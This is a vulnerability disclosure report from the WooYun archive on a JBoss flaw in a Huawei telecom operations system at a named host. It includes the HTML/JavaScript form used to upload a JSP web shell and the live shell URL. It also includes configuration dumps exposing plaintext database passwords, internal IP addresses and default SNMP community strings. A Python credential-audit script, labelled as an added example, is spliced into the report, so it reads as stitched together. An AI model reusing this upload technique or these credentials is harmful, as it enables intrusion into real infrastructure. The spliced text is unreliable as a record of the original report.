WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
2015-01-04: Details sent to the vendor, awaiting vendor processing
2015-01-04: Vendor confirmed; details disclosed to the vendor only
2015-01-14: Details disclosed to core white hats and relevant domain experts
2015-01-24: Details disclosed to regular white hats
2015-02-03: Details disclosed to intern white hats
2015-02-18: Details disclosed to the public
JBoss vulnerability in a Huawei O&M system
This appears to be a Huawei system for 2G, 3G and 4G equipment in some overseas region. Addresses: http://tms.mshcpt.net and http://tms.mshcpt.net:7007/eomsexp:
<html>
<head>
  <meta http-equiv="content-type" content="text/html;charset=utf-8">
  <title>jsp-test</title>
</head>
<style>
  .main{width:980px;height:600px;margin:0 auto;}
  .url{width:300px;}
  .fn{width:60px;}
  .content{width:80%;height:60%;}
</style>
<script>
  function upload(){
    var url = document.getElementById('url').value,
        content = document.getElementById('content').value,
        fileName = document.getElementById('fn').value,
        form = document.getElementById('fm');
    if(url.length == 0){ alert("Url not allowd empty!"); return ; }
    if(content.length == 0){ alert("Content not allowd empty!"); return ; }
    if(fileName.length == 0){ alert("FileName not allowd empty!"); return ; }
    form.action = url;
    form.submit();
  }
</script>
<body>
  <div class="main">
    <form id="fm" method="post">
      URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />
      FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
      <a href="javascript:upload();">Upload</a><br/>
      <textarea id="content" class="content" name="t" ></textarea>
    </form>
  </div>
</body>
</html>
The upload yielded a shell: http://tms.mshcpt.net:7007/upload5warn/css.jsp
Huawei's stuff is so sophisticated that I can't make sense of it.
dataSource.driverClassName=oracle.jdbc.driver.OracleDriver
dataSource.url=jdbc:oracle:thin:@10.5.94.3:1521:tms
dataSource.username=eomshcpt
dataSource.password=eomshcpt?
#oracle datasource configuration: choose method 1 or method 2
#method 1: read the settings below
#dataSource.driverClassName=oracle.jdbc.driver.OracleDriver
#dataSource.url=jdbc:oracle:thin:@10.5.94.3:1521:tms
#dataSource.username=eomshcpt
#dataSource.password=eomshcpt
#dataSource.maxActive= 12
#method 2: read the oracle-ds configuration from JBoss
#dataSource.jndiName=java:jndi_eoms
#dataSource1.driverClassName=oracle.jdbc.driver.OracleDriver
#dataSource1.url=jdbc:oracle:thin:@10.162.11.98:1521:loushang
#dataSource1.username=l5
#dataSource1.password=l5
#dataSource2.jndiName=jndi_eoms
#db2 datasource configuration
#dataSource.driverClassName=com.ibm.db2.jcc.DB2Driver
#dataSource.url=jdbc:db2://10.162.12.98:50000/osgi
#dataSource.username=db2admin
#dataSource.password=ls5
#sql server2000 datasource configuration
#dataSource.driverClassName=com.microsoft.jdbc.sqlserver.SQLServerDriver
#dataSource.url=jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=loushang
#dataSource.username=sa
#dataSource.password=sa
#sql server2005 datasource configuration
#dataSource.driverClassName=com.microsoft.sqlserver.jdbc.SQLServerDriver
#dataSource.url=jdbc:sqlserver://localhost:1433;DatabaseName=loushang
#dataSource.username=sa
#dataSource.password=sa
#mysql datasource configuration
#dataSource.driverClassName=org.gjt.mm.mysql.Driver
#dataSource.url=jdbc:mysql://10.13.1.183:3306/loushang?useUnicode=true&characterEncoding=utf-8
#dataSource.username=root
#dataSource.password=root
<?xml version="1.0" encoding="UTF-8"?>
<NBI version="NBI4">
  <!-- The "SystemName" tag holds the name of the whole interface program. It must match the name in the OMC table in the database.
       When an external system sends commands to the interface program, this SystemName is the name of the target module. The name is unique across interface programs. -->
  <SystemName>HWU2000SNMP@@@U2000_196</SystemName>
  <EmsIp id="1">10.16.11.11</EmsIp> <!-- Identifies the EMS that sends alarms; not used in the code -->
  <SnmpTrapListenPort>5555</SnmpTrapListenPort>
  <Community>private</Community>
  <FMAlarmCollect name="U2000-SNMP">
    <!-- The attribute of the OMC -->
    <OMCPrivate>
      <!-- IP address of the server hosting U2000 / port configured for the U2000 MIB node -->
      <RemoteSnmpAgent>10.16.11.11/9999</RemoteSnmpAgent>
      <!-- U2000 sync start node -->
      <syncStartOid>1.3.6.1.4.1.2011.2.15.1.7.7.4.0</syncStartOid>
      <!-- U2000 sync end node -->
      <syncEndOid>1.3.6.1.4.1.2011.2.15.1.7.7.5.0</syncEndOid>
      <!-- The U2000 sync start and end times may both be left unset, which queries all active alarms.
           If only the start time is set, the end time is the current system time.
           If an end time is given, a start time must also be given. -->
      <syncStartTime>20101128120000</syncStartTime><!-- sync start time (YYMMDDhhmmss) -->
      <syncEndTime>20101129120000</syncEndTime><!-- sync end time (YYMMDDhhmmss) -->
      <!-- sync implemented via shell commands -->
      <syncStartCmd>SNMP4J -c private -v 2c -p SET udp:10.13.49.205/9812 1.3.6.1.4.1.2011.2.15.1.7.7.4.0={s}10.13.57.53:6666</syncStartCmd>
      <syncEndCmd>SNMP4J -c private -v 2c -p SET udp:10.13.49.205/9812 1.3.6.1.4.1.2011.2.15.1.7.7.5.0={s}10.13.57.53:6666</syncEndCmd>
      <syncMode>new</syncMode>
    </OMCPrivate>
  </FMAlarmCollect>
  <EventFilter name="Context_Filter">
    <Filter filter_flag="pass" name="filter alarm">EventName=MW_LOF|EventName=MW_RDI|EventName=ETH_LOS|Func_Type=Sync_StartMark|Func_Type=Sync_EndMark</Filter>
    <Filter filter_flag="unpass" name="filter alarm1">FaultFlag=Change|FaultFlag=Acknowledge</Filter>
  </EventFilter>
  <!--*********************************************** StringEvent2QueueJms ****************************************************************-->
  <EventOperator name="Send_2_JMS">
    <URL>jnp://${FMP_APP_IP}:17201</URL>
    <ContextFactory>org.jnp.interfaces.NamingContextFactory</ContextFactory>
    <ConnFactory>ConnectionFactory</ConnFactory>
    <Destination>Alarm_Queue</Destination>
  </EventOperator>
</NBI>
<?xml version="1.0" encoding="UTF-8"?>
<NBI version="NBI4">
  <!-- The "SystemName" tag holds the name of the whole interface program. It must match the name in the OMC table in the database.
       When an external system sends commands to the interface program, this SystemName is the name of the target module. The name is unique across interface programs. -->
  <SystemName>PMSOCKET@@@PM4H</SystemName>
  <!-- Server listen port -->
  <ListenPort>17891</ListenPort>
  <!-- Server hostname -->
  <OMCIP>10.13.57.5</OMCIP>
  <!--*********************************************** EventFilter ****************************************************************-->
  <EventFilter name="Context_Filter">
    <Filter filter_flag="unpass" name="filter alarm">Category=Event\n.*?Severity=Major</Filter>
    <Filter filter_flag="unpass" name="filter alarm1">Category=Event\n.*?Severity=Minor</Filter>
    <Filter filter_flag="unpass" name="filter alarm2">Category=Event\n.*?Severity=Warning</Filter>
  </EventFilter>
  <!--*********************************************** StringEvent2QueueJms ****************************************************************-->
  <EventOperator name="Send_2_JMS">
    <URL>jnp://10.16.1.24:17201</URL>
    <ContextFactory>org.jnp.interfaces.NamingContextFactory</ContextFactory>
    <ConnFactory>ConnectionFactory</ConnFactory>
    <Destination>Alarm_Queue</Destination>
  </EventOperator>
</NBI>
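The datasource properties file and the NBI XML above both carry secrets in the clear: an active DB credential (the commented-out "method 2" would instead let JBoss hold it via JNDI) and a default SNMP community string. The following audit is an added example for this report, not Huawei's or the reporter's code; it parses both formats on constructed samples in the same layout, skips commented-out lines, and flags the weak settings.

```python
# Added audit example for this report (not the vendor's code); inputs are constructed.
import re
import xml.etree.ElementTree as ET

# Keys whose last path element names a credential or SNMP community string
SECRET_KEY = re.compile(r"(password|passwd|secret|community)$", re.IGNORECASE)
DEFAULT_COMMUNITIES = {"public", "private"}
PROP_LINE = re.compile(r"^([^=:\s]+)\s*[=:]?\s*(.*)$")

def parse_properties(text):
    """Return {key: value} for active lines of a Java properties file.
    '#'/'!' lines are comments, so the commented-out alternative
    datasources (method 2, db2, mysql, ...) are not reported."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = PROP_LINE.match(line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props

def audit_properties(text):
    """Flag active credential keys that carry a non-empty literal value."""
    return [(k, "plaintext credential") for k, v in parse_properties(text).items()
            if v and SECRET_KEY.search(k.rsplit(".", 1)[-1])]

def audit_nbi_xml(text):
    """Flag <Community> elements that still use a default SNMP community."""
    return [("Community", "default SNMP community")
            for el in ET.fromstring(text).iter("Community")
            if (el.text or "").strip().lower() in DEFAULT_COMMUNITIES]

# Constructed samples in the layout of the report's files; all values are fake
SAMPLE_PROPS = """\
dataSource.driverClassName=oracle.jdbc.driver.OracleDriver
dataSource.url=jdbc:oracle:thin:@10.0.0.1:1521:tms
dataSource.username=appuser
dataSource.password=appuser
#method 2: look the datasource up in JBoss via JNDI instead (inactive here)
#dataSource.jndiName=java:jndi_eoms
#dataSource.password=commented_out
"""
SAMPLE_NBI = "<NBI version='NBI4'><Community>private</Community></NBI>"

if __name__ == "__main__":
    print(audit_properties(SAMPLE_PROPS) + audit_nbi_xml(SAMPLE_NBI))
```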
In the /opt/netwatcher/tm/tmserver/bin directory:
It looks like someone has been here before.
Apply patches.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-01-04 17:18
They have been notified to remediate. Thanks to the white hat for the reminder.
None